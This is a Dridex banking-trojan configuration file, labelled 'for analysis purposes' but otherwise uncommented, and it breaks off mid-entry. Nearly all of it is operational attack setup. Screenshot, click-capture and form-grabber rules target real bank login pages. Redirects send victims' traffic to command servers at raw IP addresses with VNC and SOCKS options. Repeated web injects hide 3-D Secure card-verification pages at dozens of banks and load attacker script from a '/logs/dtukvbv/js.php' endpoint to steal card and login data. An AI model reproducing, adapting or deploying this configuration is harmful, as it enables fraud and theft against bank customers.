Dridex bot 220 settings

1. Dridex bot 220 settings for analysis purposes:
2. <settings hash="f872348d9ca57eb4f2a381b8543a19f4c047bda0">
3. <httpshots>
4. <url type="deny" onget="1" onpost="1">\.(gif|png|jpg|css|swf|ico|js)($|\?)</url>
5. <url type="deny" onget="1" onpost="1">(resource\.axd|yimg\.com)</url>
6. <url type="allow" onget="1" onpost="1">^https://www\.bankline\.(natwest\.com|rbs\.com|ulsterbank\.(ie|co\.uk))/</url>
7. </httpshots>
8. <httpinjblock>
9. <url type="allow">(|\.)alstats\.com</url>
10. <url type="allow">sucmetrics\.unicredit\.it</url>
11. <url type="allow">uni\.ibank\.nbg\.gr</url>
12. <url type="allow">www7\.onlinebanking\.natwestoffshore\.com</url>
13. <url type="allow">staticres\.klikbca\.com</url>
14. <url type="allow">www7\.rbsdigital\.com</url>
15. <url type="allow">www3\.bankline\.rbs\.com</url>
16. <url type="allow">check\.tsb\.co\.uk</url>
17. <url type="allow">www7\.ulsterbankanytimebanking\.co\.uk</url>
18. <url type="allow">www7\.ulsterbankanytimebanking\.ie</url>
19. <url type="allow">www3\.bankline\.ulsterbank\.co\.uk</url>
20. <url type="allow">www3\.bankline\.ulsterbank\.ie</url>
21. <url type="allow">pioneer\.co\-operativebank\.co\.uk</url>
22. <url type="allow">mc3\.retail\.santander\.co\.uk</url>
23. <url type="allow">yellow\.co\-operativebank\.co\.uk</url>
24. <url type="allow">www3\.bankline\.natwest\.com</url>
25. <url type="allow">tppa\.bmo\.com</url>
26. <url type="allow">www7\.onlinebanking\.natwestoffshore\.com</url>
27. <url type="allow">www\.t32\.pnc\.com</url>
28. <url type="allow">pane\.bankofamerica\.com</url>
29. <url type="allow">www\.u43\.pnc\.com/pressroom</url>
30. <url type="allow">www\.isbank\.com\.tr/Internet/images7</url>
31. <url type="allow">fbds7\.tangerine\.ca</url>
32. <url type="allow">www7\.suntrust\.com</url>
33. <url type="allow">tts\.dlbank\.be</url>
34. <url type="allow">iss\.gtbank\.com</url>
35. <url type="allow">www7\.nwolb\.com</url>
36. <url type="allow">b8k\.nationwide\.co\.uk</url>
37. <url type="allow">smetrics\.nationwide\.co\.uk</url>
38. <url type="allow">road\.nationwide\.co\.uk</url>
39. <url type="allow">roll\.nationwide\.co\.uk</url>
40. <url type="allow">cws\.bankline\.rbs\.com</url>
41. <url type="allow">cws\.bankline\.natwest\.com</url>
42. <url type="allow">nsc\.natwest\.com</url>
43. <url type="allow">nsc\.rbs\.co\.uk</url>
44. <url type="allow">nsc\.ulsterbank\.co\.uk</url>
45. <url type="allow">sc\.natwest\.com</url>
46. <url type="allow">sc\.rbs\.co\.uk</url>
47. <url type="allow">sc\.ulsterbank\.co\.uk</url>
48. <url type="allow">marketing\.lloydsbank\.co\.uk</url>
49. <url type="allow">marketing\.bankofscotland\.co\.uk</url>
50. <url type="allow">marketing\.tsb\.co\.uk</url>
51. <url type="allow">.*\.member-hsbc-group\.com</url>
52. <url type="allow">mcmprod\.hsbc\.co\.uk</url>
53. <url type="allow">cdn\.bankofscotland\.co\.uk</url>
54. <url type="allow">lab\.lloydsbank\.com</url>
55. <url type="allow">check\.lloydsbank\.co\.uk</url>
56. <url type="allow">check2\.lloydsbank\.co\.uk</url>
57. <url type="allow">check\.bankofscotland\.co\.uk</url>
58. <url type="allow">check2\.bankofscotland\.co\.uk</url>
59. <url type="allow">cs\.directnet\.com/dn/csd/u4F</url>
60. <url type="allow">grey\.smile\.co\.uk</url>
61. <url type="allow">u8n\.business\.santander\.co\.uk</url>
62. <url type="allow">www7\.secure\.investec\.com</url>
63. <url type="allow">press\.retail\.santander\.co\.uk</url>
64. <url type="allow">images\.coventrybuildingsociety\.co\.uk</url>
65. <url type="allow">www\.bankline\.natwest\.com/CWSLogon/analytics</url>
66. <url type="allow">www\.bankline\.ulsterbank\.ie/CWSLogon/analytics</url>
67. <url type="allow">www\.bankline\.ulsterbank\.co\.uk/CWSLogon/analytics</url>
68. <url type="allow">www\.bankline\.rbs\.com/CWSLogon/analytics</url>
69. <url type="allow">metrics\.barclays\.co\.uk</url>
70. <url type="allow">smetrics\.barclays\.co\.uk</url>
71. <url type="allow">media\.barclays\.co\.uk</url>
72. <url type="allow">resources\.barclays\.co\.uk</url>
73. <url type="allow">cdn\.riyadonline\.com</url>
74. <url type="allow">rac\.bankia\.es</url>
75. <url type="allow">web12\.columbiabank\.com</url>
76. <url type="allow">marketing\.halifax\-online\.co\.uk</url>
77. <url type="allow">room\.business\.santander\.co\.uk</url>
78. <url type="allow">indigo\.co\-operativebank\.co\.uk</url>
79. <url type="allow">reporting\.cbonline\.co\.uk</url>
80. <url type="allow">cdn\.retail\.metrobankonline\.co\.uk</url>
81. <url type="allow">img3\.moneygram\.com</url>
82. <url type="allow">mujcz\.erasvet\.cz</url>
83. </httpinjblock>
84. <httpblock>
85. <url type="allow">.*\.levexis\.com</url>
86. <url type="allow">.*\.omtrdc\.net</url>
87. <url type="allow">.*\.doubleclick\.net</url>
88. <url type="allow">.*\.parastorage\.com</url>
89. <url type="allow">.*\.webtrendslive\.com</url>
90. <url type="allow">webtrends\.com</url>
91. <url type="allow">.*\.creativevirtual\.com</url>
92. <url type="allow">.*\.tiqcdn\.com</url>
93. <url type="allow">.*\.serving-sys\.com</url>
94. <url type="allow">.*\.maxymiser\.net</url>
95. <url type="allow">.*\.atdmt\.com</url>
96. <url type="allow">splash-screen\.net</url>
97. <url type="allow">www\.analytics\-control\.com</url>
98. <url type="allow">.*\.smartsourceportal\.com</url>
99. <url type="allow">.*\.na1\.netsuite\.com</url>
100. <url type="allow">.*\.userreplay\.net</url>
101. <url type="allow">.*\.sessioncam\.com</url>
102. <url type="allow">.*\.intenthq\.com</url>
103. <url type="allow">.*\.tribalfusion\.com</url>
104. <url type="allow">.*\.mookie1\.com</url>
105. <url type="allow">.*\.adnxs\.com</url>
106. <url type="allow">assets\.adobedtm\.com</url>
107. <url type="allow">.*\.jwpcdn\.com</url>
108. <url type="allow">.*\.mediaplex\.com</url>
109. <url type="allow">unicredit\.it/ecomm/logrequest\.jsp</url>
110. </httpblock>
111. <formgrabber>
112. <url type="deny">\.(swf)($|\?)</url>
113. <url type="deny">/isapi/ocget.dll</url>
114. <url type="allow">^https?://aol.com/.*/login/</url>
115. <url type="allow">^https?://accounts.google.com/ServiceLoginAuth</url>
116. <url type="allow">^https?://login.yahoo.com/</url>
117. <url type="allow">^https?://login.live.com/</url>
118. <url type="deny">^https?://(\w+\.)?aol.com</url>
119. <url type="deny">^https?://(\w+\.)?facebook.com/</url>
120. <url type="deny">^https?://(\w+\.)?google</url>
121. <url type="deny">^https?://(\w+\.)?yahoo</url>
122. <url type="deny">^https?://(\w+\.)?youtube.com</url>
123. <url type="deny">^https?://(\w+\.)?live.com</url>
124. <url type="deny">^https?://(\w+\.)?twitter.com</url>
125. <url type="deny">^https?://(\w+\.)?vk.com</url>
126. <url type="deny">^https.*ocsp\..+$</url>
127. <url type="deny">^https.*safebrowsing\..+$</url>
128. <url type="deny">^https?://fhr\.data\.mozilla\.com</url>
129. <url type="deny">^https://s.*\.symcd\.com</url>
130. <url type="deny">^https://s.*\.symcb\.com</url>
131. <url type="deny">^https.*ocsp2\..+$</url>
132. <url type="deny">localhost.+skypectoc/.+$</url>
133. <url type="deny">\.messenger\.live\.com</url>
134. <url type="deny">pipe\.skype\.com</url>
135. <url type="deny">\.optimatic\.com</url>
136. <url type="deny">hiro\.tv</url>
137. <url type="deny">spotxchange\.com</url>
138. <url type="deny">nielsen\.com</url>
139. <url type="deny">mapquest\.com</url>
140. <url type="deny">^https://.+\.skype\.com/api/</url>
141. <url type="deny">(//|\.)lphbs.com</url>
142. <url type="deny">(//|\.)zynga.com</url>
143. </formgrabber>
144. <clickshots>
145. <url type="allow" onpost="1" onget="1" clicks="12" xrange="40" yrange="40">^https://ibank1\.bib\.barclays\.com/logon/bibapplication.+LOGON\.VALIDATE\.SIGNED</url>
146. <url type="allow" onpost="1" onget="1" clicks="12" xrange="40" yrange="40">^https://cashmanagement\.barclays\.net/portalservices/forms/login\.pser\?TYPE.+cashmanagement</url>
147. </clickshots>
148. <redirects>
149. <redirect name="1st" vnc="0" socks="0" uri="http://80.86.93.225:8080/userexperiences" timeout="20">webstsomni.js</redirect>
150. <redirect name="2nd" vnc="1" socks="1" uri="http://80.86.93.225:8080/tickingservice" timeout="20">webcticker.js</redirect>
151. <redirect name="vbv1" vnc="0" socks="0" postfwd="1" uri="http://202.190.179.94:8080/logs/dtukvbv/js.php" timeout="20">/logs/dtukvbv/js.php</redirect>
152. <redirect name="vbv2" vnc="0" socks="0" postfwd="1" uri="http://202.190.179.94:8080/logs/dtukvbv/in.php" timeout="20">/logs/dtukvbv/in.php</redirect>
153. </redirects>
154. <httpinjects>
155. <httpinject>
156. <conditions>
157. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://.*/tdsecure/intro\.jsp.*]]></url>
158. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
159. </url>
160. </conditions>
161. <actions>
162. <modify>
163. <pattern modifiers="msU"><![CDATA[onKeyDown\=".*"]]></pattern>
164. <replacement><![CDATA[onKeyDown=""]]></replacement>
165. </modify>
166. <modify>
167. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
168. <replacement><![CDATA[\1<style type="text/css">
169. body {visibility: hidden; }
170. </style>
171. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
172. <script type="text/javascript" language="JavaScript">
173. (function() {
174. if(!document.getElementById('owf82ivosd')) {
175. var system = '';
176. var refer = document.referrer;
177. if(refer && refer.length) {
178. if(refer.match(/partner=([^&]+)&/i)) {
179. system = refer.match(/partner=([^&]+)&/i)[1];
180. else if(refer.match(/partner=([^&]+)$/i)) {
181. system = refer.match(/partner=([^&]+)$/i)[1];
182. if(system) {
183. if(refer.indexOf('https://secure.barclaycard.co.uk/barclays/tdsecure/') !== -1) { // domain
184. system = system.toLowerCase();
185. if(system == 'debit.visa') { // system
186. system = 'barclays.debit.visa'; // edited system
187. else if(system == 'debit.mc') {
188. system = 'barclays.debit.mc';
189. else if(system == 'barclaycard.visa') {
190. system = 'barclaycard.visa';
191. else if(system == 'barclaycard.mc') {
192. system = 'barclaycard.mc';
193. else if(system == 'business.visa') {
194. system = 'barclays.business.visa';
195. else if(system == 'business.mc') {
196. system = 'barclays.business.mc';
197. else if(refer.indexOf('https://verifiedbyvisa.barclays.co.uk/barclays/tdsecure/') !== -1) {
198. system = system.toLowerCase();
199. if(system == 'debit.mc') {
200. system = 'vbv.barclays.debit.mc';
201. else if(system == 'debit.visa') {
202. system = 'vbv.barclays.debit.visa';
203. else if(refer.indexOf('https://www.clicksafe.lloydstsb.com/lloyds/tdsecure/') !== -1) {
204. system = system.toLowerCase();
205. if(system == 'mc') {
206. system = 'clicksafe.mc';
207. else if(system == 'debit') {
208. system = 'clicksafe.debit';
209. else if(refer.indexOf('https://www.securesuite.co.uk/lloyds/tdsecure/') !== -1) {
210. system = system.toLowerCase();
211. if(system == 'corporate.mc') {
212. system = 'lloyds.corporate.mc';
213. else if(system == 'corporate.visa') {
214. system = 'lloyds.corporate.visa';
215. else if(refer.indexOf('https://www.securesuite.co.uk/verde/tdsecure/') !== -1) {
216. system = system.toLowerCase();
217. if(system == 'mc') {
218. system = 'verde.mc';
219. else if(system == 'debit') {
220. system = 'verde.debit';
221. else if(refer.indexOf('https://www.securesuite.co.uk/alliance-leicester/tdsecure/') !== -1) {
222. system = system.toLowerCase();
223. if(system == 'retail') {
224. system = 'alliance-leicester.retail';
225. else if(system == 'commercial') {
226. system = 'alliance-leicester.commercial';
227. else if(refer.indexOf('https://www.securesuite.co.uk/isracard/tdsecure/') !== -1) {
228. system = system.toLowerCase();
229. if(system == 'mc') {
230. system = 'isracard.mc';
231. else if(system == 'debit') {
232. system = 'isracard.debit';
233. var c = Math.random();
234. var script = document.createElement('script');
235. script.type = 'text/javascript';
236. script.id = 'owf82ivosd';
237. script.src = '/logs/dtukvbv/js.php?r='+encodeURIComponent(c.toString())+'&botid='+encodeURIComponent('$_BOT_ID_$')+'&type=js&system='+system;
238. document.getElementsByTagName('head')[0].appendChild(script);
239. })();
240. </script>]]></replacement>
241. </modify>
242. </actions>
243. </httpinject>
244. <httpinject>
245. <conditions>
246. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://www\.securesuite\.co\.uk/aib/tdsecure/pa\.jsp.*aib\.visa&.*]]></url>
247. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
248. </url>
249. </conditions>
250. <actions>
251. <modify>
252. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
253. <replacement><![CDATA[\1<style type="text/css">
254. body {visibility: hidden; }
255. </style>
256. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
257. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=aib.visa"></script>]]></replacement>
258. </modify>
259. </actions>
260. </httpinject>
261. <httpinject>
262. <conditions>
263. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://www\.securesuite\.co\.uk/aib/tdsecure/pa\.jsp.*aib\.mc&.*]]></url>
264. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
265. </url>
266. </conditions>
267. <actions>
268. <modify>
269. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
270. <replacement><![CDATA[\1<style type="text/css">
271. body {visibility: hidden; }
272. </style>
273. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
274. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=aib.mc"></script>]]></replacement>
275. </modify>
276. </actions>
277. </httpinject>
278. <httpinject>
279. <conditions>
280. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://www\.securesuite\.co\.uk/aib/tdsecure/pa\.jsp.*SAGA&.*]]></url>
281. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
282. </url>
283. </conditions>
284. <actions>
285. <modify>
286. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
287. <replacement><![CDATA[\1<style type="text/css">
288. body {visibility: hidden; }
289. </style>
290. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
291. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=SAGA"></script>]]></replacement>
292. </modify>
293. <modify>
294. <pattern modifiers="msU"><![CDATA[onKeyDown\=".*"]]></pattern>
295. <replacement><![CDATA[onKeyDown=""]]></replacement>
296. </modify>
297. </actions>
298. </httpinject>
299. <httpinject>
300. <conditions>
301. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://www\.securesuite\.co\.uk/aib/tdsecure/pa\.jsp.*ftb\.visa&.*]]></url>
302. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
303. </url>
304. </conditions>
305. <actions>
306. <modify>
307. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
308. <replacement><![CDATA[\1<style type="text/css">
309. body {visibility: hidden; }
310. </style>
311. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
312. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=ftb.visa"></script>]]></replacement>
313. </modify>
314. </actions>
315. </httpinject>
316. <httpinject>
317. <conditions>
318. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://www\.securesuite\.co\.uk/aib/tdsecure/pa\.jsp.*ftb\.mc&.*]]></url>
319. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
320. </url>
321. </conditions>
322. <actions>
323. <modify>
324. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
325. <replacement><![CDATA[\1<style type="text/css">
326. body {visibility: hidden; }
327. </style>
328. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
329. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=ftb.mc"></script>]]></replacement>
330. </modify>
331. </actions>
332. </httpinject>
333. <httpinject>
334. <conditions>
335. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://secure.*\.arcot\.com/acspage/cap\?RID\=.*]]></url>
336. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
337. </url>
338. </conditions>
339. <actions>
340. <modify>
341. <pattern modifiers="msU"><![CDATA[(\<HEAD.*\>)]]></pattern>
342. <replacement><![CDATA[\1<style type="text/css">
343. body {visibility: hidden; }
344. </style>
345. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
346. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=arcot.secure"></script>]]></replacement>
347. </modify>
348. </actions>
349. </httpinject>
350. <httpinject>
351. <conditions>
352. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://tsys\.arcot\.com/acspage/cap\?RID\=.*]]></url>
353. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
354. </url>
355. </conditions>
356. <actions>
357. <modify>
358. <pattern modifiers="msU"><![CDATA[(\<HEAD.*\>)]]></pattern>
359. <replacement><![CDATA[\1<style type="text/css">
360. body {visibility: hidden; }
361. </style>
362. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
363. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=arcot.tsys"></script>]]></replacement>
364. </modify>
365. </actions>
366. </httpinject>
367. <httpinject>
368. <conditions>
369. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://cap\.securecode\.com/acspage/cap\?RID\=.*]]></url>
370. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
371. </url>
372. </conditions>
373. <actions>
374. <modify>
375. <pattern modifiers="msU"><![CDATA[(\<HEAD.*\>)]]></pattern>
376. <replacement><![CDATA[\1<style type="text/css">
377. body {visibility: hidden; }
378. </style>
379. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
380. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=securecode"></script>]]></replacement>
381. </modify>
382. </actions>
383. </httpinject>
384. <httpinject>
385. <conditions>
386. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://www\.citibank\.co\.in/acspage/cap_nsapi\.so\?RID\=.*]]></url>
387. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
388. </url>
389. </conditions>
390. <actions>
391. <modify>
392. <pattern modifiers="msU"><![CDATA[(\<HEAD.*\>)]]></pattern>
393. <replacement><![CDATA[\1<style type="text/css">
394. body {visibility: hidden; }
395. </style>
396. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
397. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=citibank.co.in"></script>]]></replacement>
398. </modify>
399. </actions>
400. </httpinject>
401. <httpinject>
402. <conditions>
403. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://www\.mycardsecure\.com/acspage/cap\.dll\?RID\=.*]]></url>
404. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
405. </url>
406. </conditions>
407. <actions>
408. <modify>
409. <pattern modifiers="msU"><![CDATA[(\<HEAD.*\>)]]></pattern>
410. <replacement><![CDATA[\1<style type="text/css">
411. body {visibility: hidden; }
412. </style>
413. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
414. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=mycardsecure"></script>]]></replacement>
415. </modify>
416. </actions>
417. </httpinject>
418. <httpinject>
419. <conditions>
420. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://acs\.icicibank\.com/acspage/cap\?RID\=.*]]></url>
421. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
422. </url>
423. </conditions>
424. <actions>
425. <modify>
426. <pattern modifiers="msU"><![CDATA[(\<HEAD.*\>)]]></pattern>
427. <replacement><![CDATA[\1<style type="text/css">
428. body {visibility: hidden; }
429. </style>
430. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
431. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=icicibank"></script>]]></replacement>
432. </modify>
433. </actions>
434. </httpinject>
435. <httpinject>
436. <conditions>
437. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://cardsecurity\.standardchartered\.com/acspage/cap\?RID\=.*]]></url>
438. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
439. </url>
440. </conditions>
441. <actions>
442. <modify>
443. <pattern modifiers="msU"><![CDATA[(\<HEAD.*\>)]]></pattern>
444. <replacement><![CDATA[\1<style type="text/css">
445. body {visibility: hidden; }
446. </style>
447. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
448. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=standardchartered"></script>]]></replacement>
449. </modify>
450. </actions>
451. </httpinject>
452. <httpinject>
453. <conditions>
454. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://i3d\.borica\.bg/acspage/cap\?RID\=.*]]></url>
455. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
456. </url>
457. </conditions>
458. <actions>
459. <modify>
460. <pattern modifiers="msU"><![CDATA[(\<HEAD.*\>)]]></pattern>
461. <replacement><![CDATA[\1<style type="text/css">
462. body {visibility: hidden; }
463. </style>
464. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
465. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=borica"></script>]]></replacement>
466. </modify>
467. </actions>
468. </httpinject>
469. <httpinject>
470. <conditions>
471. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://acs-ch\.cal-online\.co\.il/acspage/cap\?RID\=.*]]></url>
472. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
473. </url>
474. </conditions>
475. <actions>
476. <modify>
477. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
478. <replacement><![CDATA[\1<style type="text/css">
479. body {visibility: hidden; }
480. </style>
481. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
482. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=cal-online"></script>]]></replacement>
483. </modify>
484. </actions>
485. </httpinject>
486. <httpinject>
487. <conditions>
488. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://3dsecure\.paylife\.at/acspage/cap\?RID\=.*]]></url>
489. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
490. </url>
491. </conditions>
492. <actions>
493. <modify>
494. <pattern modifiers="msU"><![CDATA[(\<HEAD.*\>)]]></pattern>
495. <replacement><![CDATA[\1<style type="text/css">
496. body {visibility: hidden; }
497. </style>
498. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
499. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=paylife"></script>]]></replacement>
500. </modify>
501. </actions>
502. </httpinject>
503. <httpinject>
504. <conditions>
505. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://3ds\.cardcenter\.ch/acspage/cap\?RID\=.*]]></url>
506. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
507. </url>
508. </conditions>
509. <actions>
510. <modify>
511. <pattern modifiers="msU"><![CDATA[(\<HEAD.*\>)]]></pattern>
512. <replacement><![CDATA[\1<style type="text/css">
513. body {visibility: hidden; }
514. </style>
515. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
516. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=cardcenter"></script>]]></replacement>
517. </modify>
518. </actions>
519. </httpinject>
520. <httpinject>
521. <conditions>
522. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://www\.sebkort\.com/skm/acspage/cap\?RID\=.*]]></url>
523. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
524. </url>
525. </conditions>
526. <actions>
527. <modify>
528. <pattern modifiers="msU"><![CDATA[(\<HEAD.*\>)]]></pattern>
529. <replacement><![CDATA[\1<style type="text/css">
530. body {visibility: hidden; }
531. </style>
532. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
533. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=sebkort"></script>]]></replacement>
534. </modify>
535. </actions>
536. </httpinject>
537. <httpinject>
538. <conditions>
539. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://acs1\.viseca\.ch/acspage/cap\?RID\=.*]]></url>
540. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
541. </url>
542. </conditions>
543. <actions>
544. <modify>
545. <pattern modifiers="msU"><![CDATA[(\<HEAD.*\>)]]></pattern>
546. <replacement><![CDATA[\1<style type="text/css">
547. body {visibility: hidden; }
548. </style>
549. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
550. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=viseca"></script>]]></replacement>
551. </modify>
552. </actions>
553. </httpinject>
554. <httpinject>
555. <conditions>
556. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://3dsecure\.icscards\.nl/acspage/cap\?RID\=.*]]></url>
557. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
558. </url>
559. </conditions>
560. <actions>
561. <modify>
562. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
563. <replacement><![CDATA[\1<style type="text/css">
564. body {visibility: hidden; }
565. </style>
566. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
567. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=icscards"></script>]]></replacement>
568. </modify>
569. </actions>
570. </httpinject>
571. <httpinject>
572. <conditions>
573. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://acs\.swisscard\.ch/acspage/cap\?RID\=.*]]></url>
574. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
575. </url>
576. </conditions>
577. <actions>
578. <modify>
579. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
580. <replacement><![CDATA[\1<style type="text/css">
581. body {visibility: hidden; }
582. </style>
583. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
584. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=swisscard"></script>]]></replacement>
585. </modify>
586. </actions>
587. </httpinject>
588. <httpinject>
589. <conditions>
590. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://3ds\.jccsecure\.com/acspage/cap\?RID\=.*]]></url>
591. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
592. </url>
593. </conditions>
594. <actions>
595. <modify>
596. <pattern modifiers="msU"><![CDATA[(\<HEAD.*\>)]]></pattern>
597. <replacement><![CDATA[\1<style type="text/css">
598. body {visibility: hidden; }
599. </style>
600. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
601. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=jccsecure"></script>]]></replacement>
602. </modify>
603. </actions>
604. </httpinject>
605. <httpinject>
606. <conditions>
607. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://secure-code\.mlp\.de/acspage/cap\?RID\=.*]]></url>
608. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
609. </url>
